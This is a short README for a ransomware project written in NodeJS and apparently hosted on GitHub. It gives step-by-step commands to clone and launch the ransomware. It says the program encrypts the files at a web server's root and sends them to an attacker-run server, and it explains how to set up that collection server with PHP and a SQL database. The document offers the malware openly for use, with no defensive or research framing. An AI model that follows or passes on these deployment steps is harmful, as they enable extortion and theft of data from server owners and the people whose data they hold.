Ransomware written in NodeJs.
Install and run
git clone https://github.com/atmoner/nodeCrypto.gitYou must edit first variable in
cd nodeCrypto && npm install
index.js
Once your configuration is complete, you can start the ransomware.
node index.jsThe files at the root of the web server will encrypt and send to the server.
Install server
Upload all file of server/ folder on your webserver.
Create a sql database and import sql/nodeCrypto.sql
Edit server/libs/db.php and add your SQL ID.